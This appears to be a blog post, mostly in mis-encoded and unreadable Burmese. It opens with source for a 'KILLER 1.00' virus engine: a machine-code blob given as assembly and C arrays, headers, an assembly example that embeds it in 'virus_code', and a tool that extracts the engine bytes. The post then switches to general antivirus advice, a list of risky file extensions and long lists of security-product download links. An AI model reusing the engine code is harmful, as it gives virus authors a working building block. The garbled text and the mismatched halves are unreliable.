----[begin KILLER.INC]--------------------------------------------------; GENERATED FILE. DO NOT EDIT.; KILLER 1.00 enginekiller_engine_size equ 30killer_engine:db 0C8h,000h,000h,000h,060h,0FCh,068h,0E8hdb 003h,000h,000h,0FFh,075h,008h,0FFh,055hdb 00Ch,083h,0C4h,008h,03Dh,09Ah,002h,000hdb 000h,074h,0FEh,061h,0C9h,0C3h----[end KILLER.INC]----------------------------------------------------

ေ�အ�က0&�ေ�ဖ��ပထ��တ�ကလညျ�� အတ�တ�ပHပ�...ဒမားHေ�ပမားယသ"�� C/C++ ထ�မား&� :

----[begin KILLER.CPP]--------------------------------------------------// GENERATED FILE. DO NOT EDIT.// KILLER 1.00 engine#define killer_engine_size 30BYTE killer_engine_bin[killer_engine_size] ={0xC8,0x00,0x00,0x00,0x60,0xFC,0x68,0xE8,0x03,0x00,0x00,0xFF,0x75,0x08,0xFF,0x55,0x0C,0x83,0xC4,0x08,0x3D,0x9A,0x02,0x00,0x00,0x74,0xFE,0x61,0xC9,0xC3};----[end KILLER.CPP]----------------------------------------------------

ASM header file:

----[begin KILLER.ASH]--------------------------------------------------; KILLER 1.00 engineKILLER_VERSION equ 0100h----[end KILLER.ASH]----------------------------------------------------

C/C++ header file:

----[begin KILLER.HPP]--------------------------------------------------// KILLER 1.00 engine#ifndef __KILLER_HPP__#define __KILLER_HPP__

#define KILLER_VERSION 0x0100

typedefvoid __cdecl killer_engine( DWORD user_param, // user-parameter DWORD __cdecl user_random(DWORD user_param, DWORD range), DWORD arg1, DWORD arg2, DWORD arg3);

#endif //__KILLER_HPP__----[end KILLER.HPP]----------------------------------------------------

အသ'��ပ@ပ'� ဥပမား� ၊ ASM ထ�တြတငး�...

----[begin EXAMPLE.ASM]-------------------------------------------------; KILLER 1.00 usage exampleinclude killer.ash

callW macro x extern x:PROC call x endm

v_data strucv_randseed dd ?; ... ends

p386 model flat locals __

.data dd ? .code

start: call virus_code push -1 callW ExitProcess

virus_code: pusha sub esp, size v_data mov ebp, esp ;; callW GetTickCount xor [ebp].v_randseed, eax ; randomize ;;

http://www.blogger.com/post-edit.g?blogID=1477119348894955027&postID=2201730710254744892#killerash

push 3 push 2 ; parameters push 1 call 5+2 ; push pointer to randomer jmp short my_random push ebp ; user-param == v_data ptr call killer_engine add esp, 4*5 ;; add esp, size v_data popa retn

; DWORD __cdecl random(DWORD user_param, DWORD range); [esp+4] [esp+8]my_random: mov ecx, [esp+4] ; v_data ptr mov eax, [ecx].v_randseed imul eax, 214013 add eax, 2531011 mov [ecx].v_randseed, eax shr eax, 16 imul eax, [esp+8] shr eax, 16 retn

;killer_engine:include killer.inc

virus_size equ $-virus_code end start----[end EXAMPLE.ASM]---------------------------------------------------

အသ'��ပ@ပ'� ဥပမား�၊ C/C++ ထ�တြတငး�...

----[begin EXAMPLE.CPP]-------------------------------------------------#include <windows.h>#pragma hdrstop#include "killer.hpp"#include "killer.cpp"struct v_struct{DWORD rseed;//...};DWORD __cdecl my_random(DWORD user_arg, DWORD range){v_struct* v = (v_struct*) user_arg;return range ? (v->rseed = v->rseed * 214013 + 2531011) % range : 0;}void main(){v_struct* v_data = (v_struct*) GlobalAlloc( GPTR, sizeof(v_struct) );v_data->rseed = GetTickCount(); // randomizevoid* engine_ptr = &killer_engine_bin;(*(killer_engine*)engine_ptr)((DWORD)v_data, my_random, 1,2,3);}----[end EXAMPLE.CPP]---------------------------------------------------

http://www.notebookofstarryprince.co.cc/2010/02/virus-engines.html#killercpp

http://www.notebookofstarryprince.co.cc/2010/02/virus-engines.html#killerhpp

engine က� compile��ပ@လပ8န � ဥပမား� program

----[begin BUILD.ASM]--------------------------------------------------- p386 model flat locals __ .data db 0EBh,02h,0FFh,01h ; signatureinclude killer.asm db 0EBh,02h,0FFh,02h ; signature .codestart: push -1 callW ExitProcess end start----[end BUILD.ASM]-----------------------------------------------------

ယသခားငး� file မား& binary(DB,DB,...)ထ�တြတငး� rip ��ဖစချJ��႔ ဥပမား� program

----[begin HAXOR.CPP]---------------------------------------------------#include <windows.h>#include <stdio.h>#include <stdlib.h>#include <io.h>#pragma hdrstopvoid main(){FILE*f=fopen("build.exe","rb");int bufsize = filelength(fileno(f));BYTE* buf = new BYTE[bufsize+1];fread(buf, 1,bufsize, f);fclose(f);int id1=0, id2=0;for (int i=0; i<bufsize; i++){if (*(DWORD*)&buf[i] == 0x01FF02EB) id1=i+4; // check signatureif (*(DWORD*)&buf[i] == 0x02FF02EB) id2=i; // check signature}f=fopen("killer.inc","wb");fprintf(f,"; GENERATED FILE. DO NOT EDIT.\r\n");fprintf(f,"; KILLER 1.00 engine\r\n");fprintf(f,"killer_size equ %i\r\n", id2-id1);fprintf(f,"killer_engine:\r\n", id2-id1);for (int i=0; i<id2-id1; i++){if ((i%8)==0) fprintf(f,"db ");fprintf(f,"0%02Xh", buf[id1+i]);if (((i%8)==7)||(i==id2-id1-1)) fprintf(f,"\r\n"); else fprintf(f,",");}fclose(f);f=fopen("killer.cpp","wb");fprintf(f,"; GENERATED FILE. DO NOT EDIT.\r\n");fprintf(f,"// KILLER 1.00 engine\r\n");fprintf(f,"#define killer_engine_size %i\r\n",id2-id1);

http://www.notebookofstarryprince.co.cc/2010/02/virus-engines.html#killercpp

http://www.notebookofstarryprince.co.cc/2010/02/virus-engines.html#killerinc

fprintf(f,"BYTE killer_engine_bin[killer_engine_size] = {\r\n");for (int i=0; i<id2-id1; i++){if ((i%8)==0) fprintf(f," ");fprintf(f,"0x%02X", buf[id1+i]);if (i!=id2-id1-1) fprintf(f,",");if ((i%8)==7) fprintf(f,"\r\n");}fprintf(f," };\r\n");fclose(f);}----[end HAXOR.CPP]-----------------------------------------------------

�ခ� example.asm ကာ��ၾကာည� ၾကာည�"# ၄ငး�ဟာ� ယဆခ�အေခ�E သ6�� ပAအေန��႔ virus အေရာေ�အေ႕ ပ�ပ6�စပါ6�စပါ�� ဖစပါ"#�ယဆ။ ��ဒ�file မ�� engine �သ6�� ပAပ#�ယဆ။ engine ဟာ� external randomer �သ6�� ပ�� randomer ကာ virus ရာေ�႕ main

body ကာ�� သ6�� ပAဖ��႔ ပငး(ငး ခငး�မ�� data ကာ��ဖ��c ��႔ randseed ကာ��သ6�� ပAပ#�ယဆ။ �ကာ��A�ရာေလအေဒ�� engine မ��ဟာ� �%ည��႔ rnd() (သ��႔) file io function မ�� (သ��႔) main object န�႔�%ည��႔ ၄ငး��႔ရာေ�႕ common structure မ��ဆငး� နည�လမ��စပါ�� ဖငး� � ခ��သ��သ��ကာ�� အေခၚ*��ငး"#�ယဆ။

Virus ကာ�တြကာယဆ ခငး�

Virus ဆ��႔ အေခ#ငး�စပါဥးအေ��ကာ�� Trojans, Worms , Searchbars , Spyware န�႔ � ခ�� Malware ပ#၀ငး.,ယဆ9��႔ မ�� Oရာေပ#လ�မ��ယဆ... Virus ရာေအေနတးျ�န ကာ�တြကာယဆ��ငတငး.ယဆ ဆ��ရာေငးအေ�� ခ�အေဖ� ပမယဆ� �ခ�ကာအေလ�အေတြ�ကာ�� ထ%�သ��ထ�� ဖ��အေ႔�� လ��ပ#�ယဆ....

(၁) Security Patch မား��က� Install လပFH။

သငး�T�႕ Operating System �တြ�ကာ available ဖစပါအေန��႔ security patch ��လ6��ကာ�� ရာေယဆ%ဖ��႔န�႔ install လ�ငတပc��ဖ��႔လ��ပ#�ယဆ... �ကာယဆ၍ Windows 98 န�႔ အေန�ကာ"��ငး� Windows အေတြ�မ�� MSIE န�႔ Windows Update အေတြ��တြ�ကာ လ��ပ.�႔ Patch အေတြ�ကာ�� Provide အေပ�အေပမယဆ� Windows 95 န�႔ �လ��% system အေတြ��တြ�ကာ အေကာ�� WindizUpdate ကာ�� သ6�� ပAသငး�"#�ယဆ...အေ�ရာေ��ၾကာ��ဆ6��အေကာ�� ပ�Nဥး updates အေတြ�ကာ�� စပါစပါအေဆ�အေပ�ဖ��႔န�႔ သငး�T�႕ Operation System �တြ�ကာအေတြ�႔ရာေ��ထ��႔ ��နည�ခ�ကာ��န�႔ ပ�8 �. �႔ အေန�ကာ( 6��သ�ငး��ခ�ကာE လကာအေတြ�ကာ�� ရာေရာေ��ဖ��႔ မ�ကာN�:ဖငး� န��:စပါငး� ထ��ရာေမ�� ဖစပါ"#�ယဆ ။

(၂) Antivirus Software န�႔ Adware Removal Tools ေ�တြတေအပGမား&�ပ� အ��က�� အ��ထ��မား�ပ@ပHန�႔

Virus အေတြ�ကာ�� ကာ�တြကာယဆU��႔�တြ�ကာ Antivirus Software အေတြ� Tools အေတြ�ကာ�� သ6��ဟာ� အေကာ�ငး��႔ သငး� Computer ကာ��ကာ�တြကာယဆU��႔�တြ�ကာ အေကာ�ငး�အေသ� အေ�လ��ကာ�ငး�+.ခ�ပ#... ဒ#အေပမယဆ� ��ဒ� Software အေတြ� Tools အေတြ�အေ�ပၚမ��ပ� ��ကာ��အေမနသငး�"#ဘး%�... Training န�႔ Virus Awareness ရာေ��အေနဖ��႔ကာ ပ��အေ�ရာေ�ၾကာ�� ဖစပါ"#�ယဆ...သ�ၾကာ��႔��ငး�ပ� လ%�မ��စပါ�ကာ ကာ��ယဆ� Computer မ�� Antivirus Software ကာ�� run ထ��ယဆ( ��ရာေငး Antivirus ကာ ကာ�တြကာ

http://windizupdate.com/files/windizupdate_setup.exe

http://www.notebookofstarryprince.co.cc/2010/02/virus-engines.html#exampleasm

ယဆအေပ�လ�မ��ယဆ ဆ�� ပ�� သ��မမ%အေ��ပ� စပါ��လအေကာ��န��F ကာပ#�ယဆ... ��ဒ#ဟာ� မ��ယဆ( ��ကာ�� အေ��ကာ"# �ခ�ကာအေတြ�ကာ�� ၾကာည� ခငး�� ဖငး� သ�ပ#လ�မ��ယဆ....

�ကာယဆ၍ သငး� Antivirus ရာေ�႕ virus definition အေတြ�ဟာ� ရာေကာ8 �Wပ� ၂ ပ�အေကာ��:+8�� ပ�� ဆ��ရာေငး သငး�T�႕ Virus

Scanner ဟာ� �သ6��မ၀ငးအေ��ပ#ဘး%�... ဘး�အေၾကာ�ငး�=9�ဆ��အေ�� သပသြစပါRကာ. �႔ Virus အေတြ�ကာ�� detected မ ဖစပါ"� ၀ပသြငး�ငး� ပAအေအေနသ�လ��႔ ဖစပါ"#�ယဆ...သငး�T�႕ ဖ��ငးအေတြ�ကာ�� remove လ�ပU��႔၊ exit လ�ပU��႔န�႔ emails အေ� မ�ကာE Zမ��ပ��႔ဖ��႔ �တြ�ကာ �လ��လ�အေတြ� ရာေ��အေနပ#အေသ��ယဆ... free antivirus program အေတြ�မ��ဆ��ရာေငး �မ�� ဖငး� �စပါ9 �ခ#ပ� update အေပ�ပ#�ယဆ... ��လ��မ�� A� software အေတြ�ကာ�� ဘးယဆအေ��မ� မသ6��မ ပAသငး�"#ဘး%...

အေန�ကာ. စပါ��ကာ �သပသြစပါRကာ9 ��႔ Virus အေတြ� ပန ႔*�6အေ႔န��႔ �ခ��နတးျS�႔ ��ဒ� Virus အေတြ�ရာေ�႕ Virus definition အေတြ�ကာ�� update အေပ��႔ �ခ��န ( ဆ��လ��အေကာ�� updae ကာ�� သငးTရာေ��႔�ခ��န ) ဟာ� � မ�လ��လ��ပ� န�ရာေ�အေပ#ငး�မ��:စပါ� တြကာ� ခ��အေန��"#�ယဆ... �ကာယဆ၍ သငး�T�႕ ISP ( Internet Service Provider ) ကာ email အေတြ�ကာ�� filter လ�ပအေပ��ယဆ( ��ရာေငးအေ��ငး Virus �သစပါအေတြ�ကာ��အေ�� သငးTရာေ��အေန�6��မ��ပ� ဖစပါ"#�ယဆ..

Virus အေတြ�ဟာ� �စပါ�#�ရာေ6မ�� သငး�T�႕ Antivirus Software ကာ�� disable လ�ပ*��+ငးFကာပ#�ယဆ... Popular ဖစပါအေန��႔ Antivirus Program အေတြ�ကာ�� သ6��မယဆ( ��ရာေငး Virus အေတြ�ကာ ��ဒ� Program ကာ�� သ� ပ�� terminate လ�ပ"#လ�မ��ယဆ...

သငး�T�႕ ISP ကာ Virus protection လ�ပအေပ�အေနသည�+.,��ငးအေ��ငး Virus �ကာ�=နတးျ96��ကာ��အေ�� ရာေပသြပD��အေ��ငး မလ�ပ*��ငး"#ဘး%�။

အေ�ရာေ�ၾကာ��အေကာ�� Email Attachment အေတြ� မ:ဖငး��ငး (သ��႔) Website ( or porn site) �စပါ��အေကာန Softwar အေတြ�ကာ��

download မလ�ပ�ငး�� သငး� browser ရာေ�႕ disk cache ကာ��ဖယဆT��အေပ�ဖ��႔လ��ပ#�ယဆ... ဘး�အေၾကာ�ငး�=9�ဆ��အေ�� website

အေတြ�႔ရာေ�႕ Viruses scan �မ��စပါ�ဟာ� Email address ရာေဖ��႔�တြ�ကာ သငး�+(�ကာ�� အေရာေ�ကာ9 ��"#�ယဆ...

(၃) Internet Explorer , Mocrosoft Word ( သ�႔ ) Outlook Express ေ�တြတက� မားသ'��ပHန�႔

လ%သ6��ရာေမ�မ��႔ web browser အေတြ�၊ လ%သ6��မ��႔ word processor ( သ��႔ ) Windows Adress Book အေတြ�ကာ��

�သ6��မ ပAသငး�"#ဘး%�.. ဘး�အေၾကာ�ငး�=9�ဆ��အေ�� Netsky virus ကာ�� ဥးပမ� �စပါ��အေ�နန�႔ ၾကာည� ၾကာည�"#။ ၄ငး� Virus ကာ

သငး�T�႕ Computer ကာ�� Email address အေတြ� ရာေဖ��႔�တြ�ကာ scan အေတြ�ဖ�"#�ယဆ...ဖ��ငး �ကာ�=နတးျ96��ကာ�� scan ဖ�. �အေ��မဟာ�

�"#ဘး%�.. အေ��ကာ"# ဖ��ငး types အေတြ�ကာ�� scan ဖ�"#�ယဆ...

.OFT ----- Outlook item template

.DOC ----- Microsoft Word Document

.EMl ----- Outlook Express email message

.WAB ----- Windows Adress Book

.DBX ----- Outlook Express email folder

.RTF ----- Rich Text formet

.TXT ----- Plain Text

http://www.symantec.com/security_response/writeup.jsp?docid=2004-030110-0232-99&tabid=2

ဒ#အေၾကာ�ငး� ��ဒ� documents အေတြ�ထ�မ�� ပ#၀ငး.�႔ email address အေတြ�ကာ�� ရာေယဆ% ပ�� Virus အေကာန mail အေတြ�ပ��႔ပ#�

ယဆ... အေကာ�ငး��အေကာ�� ခ�� email program အေတြ�န�႔ � ခ�� ခ��အေသ� word processor အေတြ�ကာ�� သ6�� ပAသ

ငး�"#�ယဆ... Microsoft Word ကာပ� word processor � ဖစပါ Available ဖစပါ.� မဟာ��"#ဘး%� MS ထကာ အေကာ�ငး��အေတြ��

မ��ၾကာ�� ရာေ��ပ#�ယဆ... ဥးပမ� OpenOffice ကာ��လည� MS �စပါ��သ6��လ��႔ရာေပ#�ယဆ... ၄ငး�ကာ viruses scan အေတြ�မဖ�*��

ငးအေ��ငး ဖနတးျ.��ထ��ပ#�ယဆ...

အေန�ကာ. စပါ��အေကာ�� Microsoft ရာေ�႕ Internet Explorer ( IE ) browser ကာ��လည� �သ6��မ ပAသငး�"#ဘး%�.. ဘး�လ��႔လ�ဆ��အေ��

IE browser ဟာ� မလ��ပ.�႔ features အေတြ�ကာ�� user မသ�ပ� (သ��႔) အေသဘး�မ�%ပ� �တြလယဆ. ကာ% ထည�အေပ�*��+ငး9�,�႔ ဖစပါ"#�ယဆ.. (

ဥးပမ� - search bar - Search bar အေတြ�ကာ�� ဘး�အေၾကာ�ငး� ကာန ႔သ�8 ငး�=9�ဆ��အေ�� ဒ� software (search bar) ကာ သငး�

Computer မ�� သငးT��ကာ8 မ�� key အေတြ�၊ သငး ၀ငးအေရာေ�ကာ9 [��8 မ�� website အေတြ� န�႔ သငး�T�႕ Computer ကာ�� အေ�၀�အေကာန� ပည�

�၀ထ�န �ခ�Aပ*��ငးU��႔ �တြ�ကာ �ခ�ကာE လကာအေတြ�ကာ�� Central hacker ဆ�ကာ�� ပ��အေ႔ပ�ဖ��႔�တြ�ကာ Adware အေတြ� Trojan အေတြ�

��ဒ� Search bar မ��ပ#၀ငး.,�"#�ယဆ....)

U.S government's Computer Emergency Rediness Team ( US-CERT) အေကာန Microsoft's Internet Explorer( IE)

bowser �သ6�� ပA ခငး�ကာ�� ရငတပ.န ႔ဖ��႔သ��အေပ�ထ��ပ#�ယဆ.. Vulnerability Note မ��ၾကာည�"#...

(၄) File-Type ေ�တြတကလညျ��သ�ထ��ဖ�႔လ�႔ပHတယသ�

Windows အေတြ�မ��ပ#��႔ စပါ��ရာေ�မNရာေ� � ပစပါ.,စပါ��အေကာ�� file extension အေတြ�ကာ�� ဖ6��တြကာယဆU��႔ default setting ပ#ရာေ�� ခငး� ဖ

စပါ"#�ယဆ... file extensions အေတြ�ဟာ� �တြလအေနတးျEရာေ�ၾကာ��ပ#�ယဆ... ဘးယဆအေ��မ� hidden မလ�ငတပ8ငး�"#ဘး%�...

သငး�T�႕ computer မ��ရာေ��႔ ဖ��ငးအေတြ�ကာ�� တြလယဆ. ကာ% ဖြခ� ခ��သ��အေပ�ဖ��႔ န�႔ ရာေ��အေအေ:ဖတြ�႔ရာေ��ဖ��႔�တြ�ကာ ဖ��ငး အေတြ�ကာ��

ကာ��ယဆN�� ပA��႔ icons အေတြ� ပAလ�ငတပc��ပ#�ယဆ... �မ�� ဖငး�အေ�� document ရာေ�႕ types �မ��A�မ�� A�မ�� ကာ��ယဆ"��ငး icon အေ

တြ�ရာေ��ၾကာပ#�ယဆ... ဥးပမယဆ.. Adobe Acrobat file အေတြ�မ�� သ�သ�အေစပါ��႔ icon �စပါ��ရာေ��ပ#�ယဆ... ဒ#အေပမယဆ� ��ဒ� icon ထ�

မ�� ပ#၀ငး.�႔ Windows Executable file (.exe) ကာ�� သ��ထ��မ�ခ�ငး�� ထ��မ�ပ#လ�မ��ယဆ...ဒ# �� ပငး � ခ�� document အေတြ�န�႔

ဆငး.ငတOအေန��အေတြ�လည� ရာေ��နတးျ��ငး"#�ယဆ... ဒ#အေၾကာ�ငး� file types ကာ�� အေတြ�ကာ�� သ�ထ��ဖ��႔အေ�ရာေ�ၾကာ��ပ#�ယဆ...

Extensions အေတြ�ကာ�� အေဖ� အေပပ�ထ��ပ#�ယဆ...��ဒ� extensions အေတြ�ပ#၀ငး.�႔ ဘးယဆattachment မဆ�� virus လ��႔ယဆ%ဆ*��

ငး"#�ယဆ...

.BAT ----- DOS batch file

.COM ----- DOS executable file

.CMD ----- Windows 2000 batch file

.CPL ----- Control Panel extension

.HTA ----- HTML application

http://www.kb.cert.org/vuls/id/713878

.JS ----- JScript

.JSE ----- JScript Encoded Script

.LNK ----- Shortcut

.MSI ----- Microsoft installer database

.PIF ----- Shortcut to DOS program

.REG ----- Registary Entries

.SCF ----- Windows Explorer command

.SCR ----- Screen Saver

.VB ----- VB Script

.VBE ----- VB Encoded Script

.VBS ----- VB Script

.WS ----- Windows Script Host

.WSC ----- Windows Script Host - Componet

.WSF ----- Windows Script Host

.WSH ----- Windows Script Host - Setting file

ဒ#� ပငး9,ည� .EXE file အေ�နန�႔လည� ရာေ��ပ#�ယဆ... ဒ#အေပမယဆ� virus မဟာ��. �႔ executable files အေတြ�လည� ရာေ��အေအေန��

သ��အေ��ထ��ဖ��႔လ��ပ#�ယဆ...�ကာယဆ၍ email အေတြ�အေကာနပ��႔��႔�ခ# ကာ��ယဆ� 6�ၾကာ[��မ;မရာေ��ဘး%� ဆ��ရာေငး မ:ဖငး�"#န�႔...

ပ��အေ�� ဘးယဆ OLE document ( OLE document အေတြ�မ�� Word and Excel documents အေတြ�ပ#၀ငး"#�ယဆ ) မဆ��

viruses ပ#၀ငး*��ငတငး.,ယဆ(�� အေမမ�ပ#န�႔...

အေန�ကာ8 ��ထ��ရာေမယဆ� extension �စပါ��အေကာ�� .ZIP ပ#။ ��ဒ�ထ�မ�� compressed files အေတြ�ပ#၀ငး"#�ယဆ... ZIP file အေတြ�ကာ

သ%��႔ထ�မ�� ပ#��႔ file ရာေ�႕ extensions အေတြ�ကာ�� ဖ6��တြကာယဆအေပ�ဖ��႔ �သ6��၀ငးအေနဆ� ဖစပါ"#�ယဆ... ဒ#အေပမယဆ�=9,ည� ZIP

လ�ငတပc��႔ Viruses အေတြ�ရာေ�႕ file names အေတြ�မ�� မ�+နတးျ.ကာယဆU��ငးT�႕ extension ကာ�� မသ�*��ငးU��႔�တြ�ကာ spaces hoping �

မ��ၾကာ��ရာေ��"#�ယဆ။ ( ဆ��လ��အေကာ�� file name မ�� ("...") ပ#၀ငး.�ကာ�� အေ ပ�� ဖစပါ"#�ယဆ...)

(၅) E-Mail ဖြျဖငး"L�Mကညျ"�8ငး� သတ�ထ��ပH

ကာ��ယဆS�႔ မသ��႔သ%အေတြ�ဆ�ကာ mail အေတြ�ကာ�� :ဖငး��ဖ��အေ��ငး သ��ထ��ဖ��႔တြလယဆအေပမယဆ� �ခ#�ရာေ6 ကာ��ယဆS�႔ သ��႔သ%အေ

တြ�ဆ�ကာ virus ပ#��႔ mail အေတြ�ကာ�� သ��မ ပAပ�:ဖငး�+.,�Fကာပ#�ယဆ... အေ��ကာ�� ပထ��႔ �ခ�ကာ (၄) ခ�ကာအေၾကာ�ငး� သငး

န�႔ သ��႔သ%အေတြ�ရာေ�႕ န�မ[n�႔ viurs ပ#��႔ Mail အေအေတြ�ရာေ�ကာ9 �*��ငး"#�ယဆ....

သ%��႔ရာေ�႕ Computer မ�� ရာေ��႔ Software အေတြ�အေကာန သ%��႔မသ�လ��ကာ�ငး�� သ%��႔ ကာ��ယဆN�� email အေတြ�ပ��႔*��ငး"#�ယဆ။

Software အေတြ�ကာ � ခ��စပါအေယဆ�ကာ( �အေကာန သ%��႔ရာေ�႕ E-mail address အေတြ�ကာ�� ယဆ% ပ�� ပ��႔လ��ကာ. �လည� ဖစပါ*��ငး"#�ယဆ။

အေန�ကာ. ခ�အေကာ�� သ%��႔ကာ��ယဆ. ��ငး �မ�+နတးျ.ကာယဆ အေပ�ပ��႔လ��ကာ. �႔ E-mail အေတြ�ပ� ဖစပါ"#�ယဆ။ ပ��အေ�� spammer အေတြ�ကာ သငး E-mail :ဖငး�U� ဖစပါအေ��ငး သ%��႔ရာေ�႕ န�မညအေတြ�ကာ�� အေပသြရာေ�ခ�ယဆ ပ�� ပ��႔လ��

ကာ. �လည� ဖစပါS��ငး"#�ယဆ။

ဒ#အေၾကာ�ငး� � ခ��သ%�စပါအေယဆ�အေကာ� န E-mail ကာ�� attachment န�႔ လ��ကာ. �႔�ခ# attachment န�႔��%ပ#လ��႔ E-mail

ရာေ�႕ body ကာ�� သ��ထ��ၾကာည�U��႔လ��ကာ"#�ယဆ...အေန�ကာ ပ�� Message headers ကာ��လည� သ��ထ��ရာေပ#မယဆ... ဒ#အေပမယဆ� �ခ#�ရာေ6မ��အေ�� information ��အေ�ယဆ�ငးအေတြ�လည� ဖစပါအေန��"#�ယဆ ... �မ�� ဖငး�အေ�� delivery route အေတြ�ကာ ယဆ6�ၾကာ[��*��ငး"#�ယဆ...။

၁။ Antivirus �%�&ငး"�� Tool မား��

Virus မ၀ငးအေ��ငး ကာ�တြကာယဆ*��dU��႔�တြ�ကာ အေ�ရာေ�ပ#��႔ �ခန �ကာ႑ျမ�� ပ#၀ငး.�႔ Antivirus န�႔ Tool မ��ကာ�� အေဖ� ပလ��ကာ.ယဆ...။

Antivirus------------------------------------------Anti Spyware

BitDefender Antivirus 2010---------------------Spy Sweeper 6.1Kaspersky Antivirus 2010-----------------------CounterSpy 3Webroot Antivirus -------------------------------STOPzilla 5.xNorton Antivirus 2010---------------------------Malwarebytes Anti MalwareESET Nod32 Antivirus 4--------------------------Spyware Doctor 5.5AVG Anti-Virus 9----------------------------------SUPER Anti Spyware Pro 4.0F-Secure Anti-Virus 2010-----------------------Ad-Aware Pro 2010G DATA AntiVirus 2010--------------------------AntiSpy 5.0Avira Antivirus Premium------------------------Spyware BeGone 9.15Trend Micro Antivirus---------------------------CA Anti SpywareClamWin Free Antivirus--------------------------a-squared Free 4.5Avast! Home Edition------------------------------CWShredder 2.19COMODO Antivirus--------------------------------Trend Micro HijackThis 2.0.3PC Tools Antivirus---------------------------------Spybot Search and DestroyPanda Antivirus Pro 2010------------------------Spyware Terminator 2.6.5.111McAfee VirusScan Plus --------------------------Spyware Blaster 4.2Quick Heal Antivirus 2010-----------------------Window DefenderArcaVir Home Protection-----------------------I hate Keyloggers 1.0BullGuard Internet Security--------------------Ashampoo AntiSpywareF-PROT Antivirus

Firewalls---------------------------------------------Email Protection

ZoneAlarm Pro 7.0--------------------------------MailWasherOutpost Firewall Free---------------------------SpamihilatorNorman Personal Firewall----------------------SpamBayeseConceal Pro 2.0---------------------------------SpamDelWebroot Desktop Firewall 5.5-----------------InboxInjoy Firewall 4------------------------------------GFI Email Security TestSygate Personal Firewall------------------------SpamEater ProComodo Firewall----------------------------------CA Anti-SpamPrimedius Firewall Lite------------------------- SPAMifighterR-Firewall------------------------------------------- ChoiceMail OneSunblet Personal Firewall----------------------Spam KillerSensive Guard--------------------------------------Spam BusterAshampoo FireWall-------------------------------Spam Agent-------------------------------------------------------- iHateSpam

Rootkit Detection & Removal--------------Encryption

http://www.sunbeltsoftware.com/Home-Home-Office/iHateSpam/

http://www.spytech-web.com/spytechonline/Files/spyagent7.zip

http://www2.ashampoo.com/webcache/html/1/product_2_0050___USD.htm

http://www.spambutcher.com/spam-buster/

http://download.cnet.com/SensiveGuard/3000-10435_4-10410823.html

http://www.spambutcher.com/spamkiller/

http://www.sunbeltsoftware.com/Home-Home-Office/Sunbelt-Personal-Firewall/

http://download.cnet.com/ChoiceMail-One/3000-2382_4-10129568.html?tag=mncol

http://www.r-tt.com/r-firewall/R_Firewall_Download.shtml

http://www.spamfighter.com/Download_download.asp

http://majorgeeks.com/Primedius_Firewall_Lite_d4146.html

http://download.cnet.com/CA-Anti-Spam-Plus/3000-2382_4-10764062.html?tag=mncol

http://personalfirewall.comodo.com/download_firewall.html

http://download.cnet.com/SpamEater-Pro/3000-2367_4-10020232.html

http://www.tucows.com/preview/213160

http://www.gfi.com/mailsecurity

http://download.cnet.com/InJoy-Firewall/3000-10435_4-10754405.html

http://www.glenn.delahoy.com/software/files/Inbox142.zip

http://www.brothersoft.com/webroot-desktop-firewall-40121.html

http://www.spamdel.com/

http://www.softpedia.com/get/Security/Firewall/eConceal-Firewall-Pro-for-Windows.shtml

http://sourceforge.net/projects/spambayes/

http://www.softsea.com/review/Norman-Personal-Firewall.html

http://www.spamihilator.com/blog

http://free.agnitum.com/

http://download.cnet.com/MailWasher-Free/3000-2382_4-10192298.html?tag=mncol

http://download.cnet.com/ZoneAlarm-Pro-2010/3000-10435_4-10061193.html

http://www.f-prot.com/download/

http://download.cnet.com/Ashampoo-AntiSpyWare/3000-8022_4-10498466.html?part=dl-61683&subj=dl&tag=button

http://www.bullguard.com/try/bullguard-internet-security.aspx

http://dewasoft.com/privacy/i-hate-keyloggers.htm

http://www.softpedia.com/get/Antivirus/ArcaVir.shtml

http://www.microsoft.com/downloads/details.aspx?FamilyId=435BFCE7-DA2B-4A6A-AFA4-F7F14E605A0D&displaylang=en

http://www.quickheal.co.in/downloads.asp

http://www.softpedia.com/get/Internet/Popup-Ad-Spyware-Blockers/SpywareBlaster.shtml

http://us.mcafee.com/root/downloads.asp?id=freeTrials

http://www.softpedia.com/get/Internet/Popup-Ad-Spyware-Blockers/Spyware-Terminator.shtml

http://www.pandasecurity.com/usa/homeusers/downloads/

http://www.safer-networking.org/en/home/index.html

http://www.pctools.com/free-antivirus/

http://www.softpedia.com/get/Antivirus/Trend-Micro-HijackThis.shtml

http://antivirus.comodo.com/index.html?currency=USD&region=North%20America&country=US

http://www.softpedia.com/get/Internet/Popup-Ad-Spyware-Blockers/CWShredder.shtml

http://www.free-av.com/

http://www.emsisoft.com/en/software/free/

http://www.clamwin.com/content/view/18/46/

http://download.cnet.com/CA-Anti-Spyware/3000-8022_4-10824830.html

http://download.cnet.com/Trend-Micro-AntiVirus-plus-AntiSpyware-32-bit/3000-2239_4-10440657.html

http://download.cnet.com/Spyware-Begone/3000-8022_4-10665542.html

http://www.avira.com/en/downloads/avira_antivir_premium.html

http://antispy1.software.informer.com/5.0/

http://www.gdata-software.com/trial-versions.html

http://www.general-search.com/fileinfo/8304381

http://www.f-secure.com/en_EMEA/downloads/trial-versions/home-office/

http://www.notebookofstarryprince.co.cc/2009/11/superantispyware-professional-v4291004.html

http://www.avg.com/us-en/download-file-stb-triavd

http://www.pctools.com/spyware-doctor/download/

http://www.eset.com/download/free_trial_download_int.php

http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html?part=dl-10804572&subj=dl&tag=button

http://download.cnet.com/Norton-AntiVirus-2010/3000-2239_4-10592477.html

http://www.stopzilla.com/products/stopzilla/spywareremover-mov.do?aid=10642&cid=STOPZILLA%205&gclid=CLyI5YWQop8CFVBd4wodTC6EIA

http://download.cnet.com/Webroot-AntiVirus-with-AntiSpyware-amp-Firewall/3000-2239_4-10746458.html

http://download.cnet.com/CounterSpy/3000-8022_4-10337358.html

http://www.kaspersky.com/trials

http://download.cnet.com/Webroot-Spy-Sweeper/3000-8022_4-10192729.html

http://www.bitdefender.com/site/Downloads/

Rootkit Revealer-----------------------------------Password SafeRootkits Detection & Removal-----------------WinGuard Pro Freethreatfire--------------------------------------------TruecryptPanda Anti-Rootkit--------------------------------Crypainer LEUnHackMe------------------------------- -----------Steganos LockNoteRootkit Hook Analyzer---------------------------Kruptos 2---------------------------------------------------=-----Najitool GUI----------------------------------------------------------Registry Pot----------------------------------------------------------pcdecrapifier

Cleaning & Tweaking-------------------------Anti-Keylogger

